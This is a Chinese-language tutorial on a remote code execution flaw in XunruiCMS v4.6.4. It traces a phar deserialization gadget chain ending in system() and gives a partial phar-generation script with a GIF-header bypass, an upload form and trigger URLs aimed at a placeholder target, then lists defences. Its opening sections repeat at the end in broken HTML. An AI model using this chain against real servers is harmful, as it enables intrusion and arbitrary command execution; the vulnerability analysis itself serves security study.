XunruiCMS 前台RCE漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2>
XunruiCMS v4.6.4及之前版本存在一个前台远程代码执行(RCE)漏洞，位于`dayrui\/Fcms\/Control\/Api\/Api.php<\/code>文件中。该漏洞通过phar协议触发反序列化，最终可导致任意代码执行。<\/p>`

环境要求<\/h2>

PHP版本：7.3.4<\/li>
操作系统：Windows<\/li>
XunruiCMS版本：v4.6.4（最新版已修复）<\/li>
<\/ul>
漏洞位置<\/h2>
dayrui\/Fcms\/Control\/Api\/Api.php<\/code>文件中的thumb<\/code>参数处理部分。<\/p>
漏洞分析<\/h2>
关键代码<\/h3>
$img =<\/span> getimagesize<\/span>($thumb);
<\/span><\/span><\/code><\/pre>$thumb<\/code>参数通过GET方式接收，经过XSS过滤但未对phar协议进行过滤，导致可以通过phar协议触发反序列化。<\/p>
漏洞触发条件<\/h3>

$thumb<\/code>参数可控<\/li>
能够上传phar文件到服务器<\/li>
能够访问触发phar反序列化的接口<\/li>
<\/ol>
绕过限制<\/h3>
原始代码中有如下检查逻辑：<\/p>
if<\/span> (strpos<\/span>($thumb, 'https:'<\/span>) ===<\/span> false<\/span> &&<\/span> strpos<\/span>($thumb, 'http:'<\/span>) ===<\/span> false<\/span> &&<\/span> strpos<\/span>($thumb, '\/'<\/span>) ===<\/span> false<\/span>)
<\/span><\/span><\/code><\/pre>对于phar:\/\/xxx<\/code>这类输入不会进入这个if语句，因此不会触发exit。<\/p>
反序列化利用链分析<\/h2>
1. 起点：__destruct方法<\/h3>
寻找可控的__destruct<\/code>方法作为利用链起点：<\/p>
public<\/span> function<\/span> __destruct() {
<\/span><\/span>    if<\/span> ($this-><\/span>redis<\/span>) {
<\/span><\/span>        $this-><\/span>redis<\/span>-><\/span>close<\/span>();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>$this->redis<\/code>可控，可以调用任意类的close方法。<\/p>
2. 调用delete方法<\/h3>
通过控制$this->memcached<\/code>和$this->lockKey<\/code>，可以调用某个类的delete方法：<\/p>
public<\/span> function<\/span> delete<\/span>($key) {
<\/span><\/span>    if<\/span> ($this-><\/span>tempAllowCallbacks<\/span>) {
<\/span><\/span>        $this-><\/span>trigger<\/span>('beforeDelete'<\/span>, $key);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 触发回调方法<\/h3>
通过trigger<\/code>方法可以调用本类的其他方法：<\/p>
protected<\/span> function<\/span> trigger<\/span>($event, ...<\/span>$params) {
<\/span><\/span>    if<\/span> (isset<\/span>($this-><\/span>{$event}) &&<\/span> is_callable<\/span>($this-><\/span>{$event})) {
<\/span><\/span>        return<\/span> call_user_func<\/span>($this-><\/span>{$event}, ...<\/span>$params);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 利用validate方法<\/h3>
找到validate<\/code>方法中的run<\/code>方法：<\/p>
public<\/span> function<\/span> run<\/span>(array<\/span> $data =<\/span> [], $dbGroup =<\/span> null<\/span>):<\/span> bool<\/span> {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $value =<\/span> dot_array_search<\/span>($rField, $data);
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $this-><\/span>processRules<\/span>($rField, $value, $rules, $data);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键点：<\/p>

$this->cleanValidationRules<\/code>需设为false<\/li>
$this->rules<\/code>可控<\/li>
$rField<\/code>和$rSetup<\/code>可控<\/li>
<\/ul>
5. 控制$value值<\/h3>
通过dot_array_search<\/code>函数控制$value<\/code>：<\/p>
function<\/span> dot_array_search<\/span>($index, array<\/span> $array) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    return<\/span> _array_search_dot<\/span>($segments, $array);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>$data['DBGroup']<\/code>可控，因此将$rField<\/code>设为'DBGroup'即可控制$value<\/code>。<\/p>
6. 最终命令执行<\/h3>
在processRules<\/code>中：<\/p>
protected<\/span> function<\/span> processRules<\/span>($field, $value, $rules, $data) {
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    if<\/span> (is_string<\/span>($rules)) {
<\/span><\/span>        $rules =<\/span> $rules($value);
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>通过控制：<\/p>

$rules<\/code>为"system"<\/li>
$value<\/code>为要执行的命令（如"calc"）<\/li>
<\/ul>
即可实现任意命令执行。<\/p>
漏洞利用步骤<\/h2>
1. 生成phar文件<\/h3>
创建包含恶意序列化数据的phar文件，需注意：<\/p>

使用gif文件头绕过图片检测<\/li>
避免包含"php"字眼<\/li>
<\/ul>
示例phar生成代码：<\/p>
\/\/ 创建恶意类
<\/span><\/span><\/span><\/span>class<\/span> Exploit<\/span> {
<\/span><\/span>    \/\/ 根据利用链设置相应属性
<\/span><\/span><\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 生成phar文件
<\/span><\/span><\/span><\/span>$phar =<\/span> new<\/span> Phar<\/span>('exploit.phar'<\/span>);
<\/span><\/span>$phar-><\/span>startBuffering<\/span>();
<\/span><\/span>$phar-><\/span>setStub<\/span>('GIF89a'<\/span>.<\/span>'<?php __HALT_COMPILER(); ?>'<\/span>); \/\/ 添加gif文件头
<\/span><\/span><\/span><\/span>$phar-><\/span>setMetadata<\/span>(new<\/span> Exploit<\/span>()); \/\/ 设置恶意对象
<\/span><\/span><\/span><\/span>$phar-><\/span>addFromString<\/span>('test.txt'<\/span>, 'test'<\/span>);
<\/span><\/span>$phar-><\/span>stopBuffering<\/span>();
<\/span><\/span><\/code><\/pre>2. 上传phar文件<\/h3>
通过头像上传功能上传phar文件，注意：<\/p>

使用表单直接上传，避免内容缺失<\/li>
修改上传参数避免缓存影响<\/li>
<\/ul>
示例上传表单：<\/p>
<form<\/span> action<\/span>=<\/span>"http:\/\/target.com\/index.php?s=member&c=account&m=upload"<\/span> method<\/span>=<\/span>"post"<\/span> enctype<\/span>=<\/span>"multipart\/form-data"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"file"<\/span> name<\/span>=<\/span>"file"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"submit"<\/span> value<\/span>=<\/span>"Upload"<\/span>>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/code><\/pre>3. 触发漏洞<\/h3>
访问包含漏洞的接口，传递phar协议路径：<\/p>
http:\/\/target.com\/api.php?s=api&c=api&m=thumb&thumb=phar:\/\/path\/to\/uploaded\/file.phar
<\/code><\/pre>
4. 绕过缓存<\/h3>
如果返回500状态码表示触发成功，200表示未触发。修改GET参数避免缓存：<\/p>
http:\/\/target.com\/api.php?s=api&c=api&m=thumb&thumb=phar:\/\/path\/to\/uploaded\/file.phar&rand=12345
<\/code><\/pre>
防御措施<\/h2>

升级到最新版XunruiCMS<\/li>
对文件上传进行严格限制<\/li>
禁用不必要的协议如phar<\/li>
对反序列化操作进行严格控制<\/li>
<\/ol>
总结<\/h2>
该漏洞通过phar协议触发反序列化，利用精心构造的利用链最终实现任意代码执行。漏洞利用需要结合文件上传功能，通过控制多个关键参数实现命令执行。防御此类漏洞需要从输入验证、文件上传控制和反序列化安全等多方面入手。<\/p>

XunruiCMS 前台RCE漏洞分析与利用教学文档<\/h1>

漏洞概述<\/h2> XunruiCMS v4.6.4及之前版本存在一个前台远程代码执行(RCE)漏洞，位于dayrui\/Fcms\/Control\/Api\/Api.php<\/code>文件中。该漏洞通过phar协议触发反序列化，最终可导致任意代码执行。<\/p>

漏洞位置<\/h2> dayrui\/Fcms\/Control\/Api\/Api.php<\/code>文件中的thumb<\/code>参数处理部分。<\/p>

漏洞利用步骤<\/h2>

漏洞概述<\/h2>
XunruiCMS v4.6.4及之前版本存在一个前台远程代码执行(RCE)漏洞，位于`dayrui\/Fcms\/Control\/Api\/Api.php<\/code>文件中。该漏洞通过phar协议触发反序列化，最终可导致任意代码执行。<\/p>`

漏洞位置<\/h2>
`dayrui\/Fcms\/Control\/Api\/Api.php<\/code>文件中的thumb<\/code>参数处理部分。<\/p>`